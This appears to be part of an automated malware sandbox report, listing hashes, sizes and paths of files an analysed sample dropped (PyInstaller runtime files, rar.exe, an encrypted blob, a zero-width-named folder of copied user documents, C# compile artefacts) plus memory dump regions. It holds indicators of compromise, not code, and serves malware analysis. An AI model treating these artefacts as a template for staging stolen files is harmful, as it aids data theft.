d76d817cac04d830707ce97b4d0d582a988e1dbd

SHA256
b9e9569931047cd6a455ec826791c2e6c249c814dc0fa71f0bd7fa7f49b8948d

SHA512
6a5affde07b5150b5aee854851f9f68c727b0f5ba83513c294d27461546a5ef67bf6c5869fc4abdadaa9bf1767ea897910c640c5494b659a29004050c9c5d099

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\blank.aes

Filesize
125KB

MD5
7bb2f982d5bad65bc1e3802a7f0adf9c

SHA1
e3396475e3dea3099545e6007f3d505d8b0a154b

SHA256
b6e7ce2189e387ea99ecf8ea954a6ab48e48e720cb167ea6112965564c1f5733

SHA512
ee0f4ca70d59d38bb29a8e3f2c81f6c74facf6b1e78fa4d2d1750c4a6b653221474dbe1d0a9a1e5e318e881125ed8727c32b6a3ed7d52cf50361922b5bec15c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\libcrypto-1_1.dll

Filesize
1.1MB

MD5
bbc1fcb5792f226c82e3e958948cb3c3

SHA1
4d25857bcf0651d90725d4fb8db03ccada6540c3

SHA256
9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

SHA512
3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\libssl-1_1.dll

Filesize
204KB

MD5
ad0a2b4286a43a0ef05f452667e656db

SHA1
a8835ca75768b5756aa2445ca33b16e18ceacb77

SHA256
2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

SHA512
cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\python311.dll

Filesize
1.6MB

MD5
9e985651962ccbccdf5220f6617b444f

SHA1
9238853fe1cff8a49c2c801644d6aa57ed1fe4d2

SHA256
3373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e

SHA512
8b8e68bbe71dcd928dbe380fe1a839538e7b8747733ba2fd3d421ba8d280a11ba111b7e8322c14214d5986af9c52ab0c75288bbb2a8b55612fb45836c56ddc36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\select.pyd

Filesize
25KB

MD5
27703f9a7c7e90e049d5542fb7746988

SHA1
bc9c6f5271def4cc4e9436efa00f231707c01a55

SHA256
fcc744cfccc1c47f6f918e66cfc1b73370d2cecdb776984fabb638745ebe3a38

SHA512
0875ad48842bbac73e59d4b0b5d7083280bde98336c8856160493cc63f7c3a419f4471f19c8537e5c8515e194c6604f9efa07d9d9af5def2f374406d316436a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\sqlite3.dll

Filesize
610KB

MD5
08ce33649d6822ff0776ede46cc65650

SHA1
941535dabdb62c7ca74c32f791d2f4b263ec7d48

SHA256
48f50e8a693f3b1271949d849b9a70c76acaa4c291608d869efe77de1432d595

SHA512
8398e54645093e3f169c0b128cbeda3799d905173c9cb9548962ecbaf3d305620f0316c7c3f27077b148b8f6d3f6146b81c53b235f04ac54668dab05b929d52f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\unicodedata.pyd

Filesize
295KB

MD5
f86f9b7eb2cb16fb815bb0650d9ef452

SHA1
b9e217146eb6194fc38923af5208119286c365ad

SHA256
b37d56ad48a70b802fb337d721120d753270dbda0854b1bfb600893fb2ce4e7a

SHA512
6c448f6d6c069ba950c555529557f678dfd17c748b2279d5eec530d7eb5db193aa1ca18dd3ce9f5220e8681a0e50b00d7de93c6744476c0e1872dafd9d5de775

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gcoqxdd5.r0d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‌ ‍‏\Common Files\Desktop\CloseShow.docx

Filesize
14KB

MD5
1f1294232ce2df05924410176542c94d

SHA1
66a5e3ae01ae2d26d12b22529a96cf440dd2e035

SHA256
51491ce540414720b04704a15137b8bc9492d1b00e6ce8fe54cc406e1768309d

SHA512
5c96086044307f98f0c91032a9415e0785d799469199ce8ae83b98fba1fcf852db29525a2a35116344c7dfed815886b98d721f80215a604293275b1161eb68e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‌ ‍‏\Common Files\Desktop\DisconnectSearch.pdf

Filesize
648KB

MD5
818efe1ff61279e48d33541f5fb5ebb9

SHA1
8f5d8eee8a789625701ad71d60341c00ab442b96

SHA256
0b5fa64b09f38f2b5bcf5585933f6796890a6d366f3c64b283d44fcd5e10a5e9

SHA512
3633cd65e17b62c43ba93cdae358a2d32df2166ef5b6dda08a2c7ea5b677bfcc5995b0cb4efa9588a8f670f9a89e1e72c1b7e82a1a13760bf86b94aa793a5675

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‌ ‍‏\Common Files\Desktop\ReadCheckpoint.xlsx

Filesize
13KB

MD5
3b73026d166ad36ab6ba8bb2e9ae33ba

SHA1
0989702f04a4ae2caf60aa33f52a7d3833122eba

SHA256
2f28130b7c8ef9d55c7e49871d75afd2e8d8672cf7d41c3d895e628dace73b0e

SHA512
a2cb7986894a18d59397423dec7f9a507c373201cfd23f93d8d3a85e1dbf2ed2641a18fea1cfcd0bf50543504dcfdf64770e03a5376a82bed75f6cf6d6c9c033

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‌ ‍‏\Common Files\Desktop\SetSplit.png

Filesize
264KB

MD5
166de620c7b39826c6d3e888e820dfd6

SHA1
b01a737eca9da283a917750aaba86d6b6dcd9607

SHA256
30c8ce3fe00875269af86d12740e336b9c26ba8ae1571c1ba412f58c98ea507f

SHA512
4327de1fcc2574d8c11262dc2ac670cc9f0cbea9d6633e7f7ae99def39a18986b7db20dbf8e995ad934eec34a0f08459a9ee57d3ffdfaf6601ef5b19a1521a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‌ ‍‏\Common Files\Documents\ClearDisable.csv

Filesize
835KB

MD5
afd5bf82490c1574aa0641fe4107bcc4

SHA1
933a76cd84a7118535c78c96154d930472d2085b

SHA256
387809564e01d7647ce31962c097f1e65e58bb17b8b9e1a8cb50535de886ee69

SHA512
6e201347d59f1bf64355bcbe6a18d02a053a9a4bd2dd9ff60aaff703dcf3cd32e6095189288c160ea482839bcdb73ce02bf8b18f3a3ec5a90886cfac5d3b4e28

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‌ ‍‏\Common Files\Documents\EditSync.doc

Filesize
671KB

MD5
c6b43d2a9a4a43aa0992ce8ce2474ed3

SHA1
c388373d1418497eae52b15e4916a419653fa71e

SHA256
023d473c1a29403e496a5518c035b91788d658f6bec410fd01a743fca75d53c5

SHA512
d48e58cadd1e639d43d7a53e98c9c38a9e8243b2b92e62bccf130bc7f0370d3bb50361685ce2afd2d27b02eda1c052cdbee84dfdc2c500024d7416a929060b4f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4q1d1hhd\4q1d1hhd.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4q1d1hhd\4q1d1hhd.cmdline

Filesize
607B

MD5
47473d8aec194c46a4c8ce05d33905b6

SHA1
2c9b78a3e1d1a4944aa527ffd2bd24134c22ca2a

SHA256
ba4957c42e0d8c809666bafcd1eda25493ffd0d80377649794c7e90bcf282e21

SHA512
1787c6ff1177d1f6f5d4ab8deb6289e04c83118a257f0aedb106f926a3df7e72a3decc5706dabe8fdc094bff73dc3bb8e5f18b4a1b784beabdf28f4e41cde3dd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4q1d1hhd\CSC960C66BFE39D463594591B7B2E2E85EE.TMP

Filesize
652B

MD5
2bffa6d8e3b0b58113cb57619747fd41

SHA1
f96751b38bcf76527856de10b8b3f8596860db16

SHA256
dd9f0969aca02715b0f60a9c155b0cae6ba4410af098379df3c4449df5c6e02a

SHA512
d8d4ce7622e6106f020ea2610262e307cf6889d7c043e6899ea4ad056d517716f6167c3cc7d1bded629eb4de86ad8233e601b3742ed60e5d2a6f03ad860eb368

Download Submit
memory/1504-0-0x0000000000400000-0x0000000000E5A000-memory.dmp

Filesize
10.4MB

Download
memory/1972-339-0x000002B91A590000-0x000002B91A598000-memory.dmp

Filesize
32KB

Download
memory/2448-188-0x0000000072360000-0x0000000072B10000-memory.dmp

Filesize
7.7MB

Download
memory/2448-184-0x000000007236E000-0x000000007236F000-memory.dmp

Filesize
4KB

Download
memory/2448-143-0x0000000005C30000-0x0000000005CC2000-memory.dmp

Filesize
584KB

Download
memory/2448-136-0x0000000006140000-0x00000000066E4000-memory.dmp

Filesize
5.6MB

Download
memory/2448-141-0x0000000072360000-0x0000000072B10000-memory.dmp

Filesize
7.7MB

Download
memory/2448-111-0x0000000005810000-0x00000000058AC000-memory.dmp

Filesize
624KB

Download
memory/2448-108-0x0000000000DD0000-0x0000000000DE2000-memory.dmp

Filesize
72KB

Download
memory/2448-98-0x000000007236E000-0x000000007236F000-memory.dmp

Filesize
4KB

Download
memory/2448-333-0x0000000072360000-0x0000000072B10000-memory.dmp

Filesize
7.7MB

Download
memory/3152-463-0x0000000005680000-0x000000000568A000-memory.dmp

Filesize
40KB

Download
memory/3536-168-0x0000000004C70000-0x0000000005298000-memory.dmp

Filesize
6.2MB

Download
memory/3536-260-0x0000000006A30000-0x0000000006AC6000-memory.dmp

Filesize
600KB

Download
memory/3536-283-0x0000000007D20000-0x000000000839A000-memory.dmp

Filesize
6.5MB

Download
memory/3536-261-0x0000000005F90000-0x0000000005FAA000-memory.dmp

Filesize
104KB

Download
memory/3536-262-0x0000000006000000-0x0000000006022000-memory.dmp

Filesize
136KB

Download
memory/3536-217-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

Filesize
304KB

Download
memory/3536-216-0x0000000005A80000-0x0000000005A9E000-memory.dmp

Filesize
120KB

Download
memory/3536-200-0x00000000053A0000-0x0000000005406000-memory.dmp

Filesize
408KB

Download
memory/3536-201-0x0000000005410000-0x0000000005476000-memory.dmp

Filesize
408KB

Download
memory/3536-215-0x00000000054D0000-0x0000000005824000-memory.dmp

Filesize
3.3MB

Download
memory/3536-199-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

Filesize
136KB

Download
memory/3536-167-0x00000000044D0000-0x0000000004506000-memory.dmp

Filesize
216KB

Download
memory/4324-263-0x000001D887760000-0x000001D887782000-memory.dmp

Filesize
136KB

Download
memory/4744-191-0x00007FFC8F670000-0x00007FFC8F728000-memory.dmp

Filesize
736KB

Download
memory/4744-314-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp

Filesize
1.4MB

Download
memory/4744-264-0x00007FFC93230000-0x00007FFC93253000-memory.dmp

Filesize
140KB

Download
memory/4744-178-0x00007FFC93230000-0x00007FFC93253000-memory.dmp

Filesize
140KB

Download
memory/4744-182-0x00007FFC94DA0000-0x00007FFC94DB9000-memory.dmp

Filesize
100KB

Download
memory/4744-189-0x00007FFC93EF0000-0x00007FFC93EFD000-memory.dmp

Filesize
52KB

Download
memory/4744-190-0x00007FFC7FDE0000-0x00007FFC80159000-memory.dmp

Filesize
3.5MB

Download
memory/4744-341-0x00007FFC94DA0000-0x00007FFC94DB9000-memory.dmp

Filesize
100KB

Download
memory/4744-195-0x00007FFC8F580000-0x00007FFC8F594000-memory.dmp

Filesize
80KB

Download
memory/4744-197-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp

Filesize
140KB

Download
memory/4744-198-0x00007FFC93220000-0x00007FFC9322D000-memory.dmp

Filesize
52KB

Download
memory/4744-205-0x00007FFC8F460000-0x00007FFC8F57C000-memory.dmp

Filesize
1.1MB

Download
memory/4744-392-0x00007FFC8F670000-0x00007FFC8F728000-memory.dmp

Filesize
736KB

Download
memory/4744-391-0x00007FFC7FDE0000-0x00007FFC80159000-memory.dmp

Filesize
3.5MB

Download
memory/4744-194-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp

Filesize
5.9MB

Download
memory/4744-192-0x00007FFC8F860000-0x00007FFC8F88E000-memory.dmp

Filesize
184KB

Download
memory/4744-180-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp

Filesize
1.4MB

Download
memory/4744-176-0x00007FFC95680000-0x00007FFC95699000-memory.dmp

Filesize
100KB

Download
memory/4744-174-0x00007FFC93260000-0x00007FFC9328D000-memory.dmp

Filesize
180KB

Download
memory/4744-165-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp

Filesize
140KB

Download
memory/4744-166-0x00007FFC98DE0000-0x00007FFC98DEF000-memory.dmp

Filesize
60KB

Download
memory/4744-417-0x00007FFC8F860000-0x00007FFC8F88E000-memory.dmp

Filesize
184KB

Download
memory/4744-453-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp

Filesize
1.4MB

Download
memory/4744-448-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp

Filesize
140KB

Download
memory/4744-447-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp

Filesize
5.9MB

Download
memory/4744-142-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp

Filesize
5.9MB

Download
memory/4744-475-0x00007FFC8F670000-0x00007FFC8F728000-memory.dmp

Filesize
736KB

Download
memory/4744-489-0x00007FFC7FDE0000-0x00007FFC80159000-memory.dmp

Filesize
3.5MB

Download
memory/4744-488-0x00007FFC93EF0000-0x00007FFC93EFD000-memory.dmp

Filesize
52KB

Download
memory/4744-487-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp

Filesize
1.4MB

Download
memory/4744-486-0x00007FFC93230000-0x00007FFC93253000-memory.dmp

Filesize
140KB

Download
memory/4744-485-0x00007FFC95680000-0x00007FFC95699000-memory.dmp

Filesize
100KB

Download
memory/4744-484-0x00007FFC93260000-0x00007FFC9328D000-memory.dmp

Filesize
180KB

Download
memory/4744-483-0x00007FFC98DE0000-0x00007FFC98DEF000-memory.dmp

Filesize
60KB

Download
memory/4744-482-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp

Filesize
140KB

Download
memory/4744-481-0x00007FFC94DA0000-0x00007FFC94DB9000-memory.dmp

Filesize
100KB

Download
memory/4744-480-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp

Filesize
5.9MB

Download
memory/4744-479-0x00007FFC8F860000-0x00007FFC8F88E000-memory.dmp

Filesize
184KB

Download
memory/4744-478-0x00007FFC8F460000-0x00007FFC8F57C000-memory.dmp

Filesize
1.1MB

Download
memory/4744-477-0x00007FFC93220000-0x00007FFC9322D000-memory.dmp

Filesize
52KB

Download
memory/4744-476-0x00007FFC8F580000-0x00007FFC8F594000-memory.dmp

Filesize
80KB

Download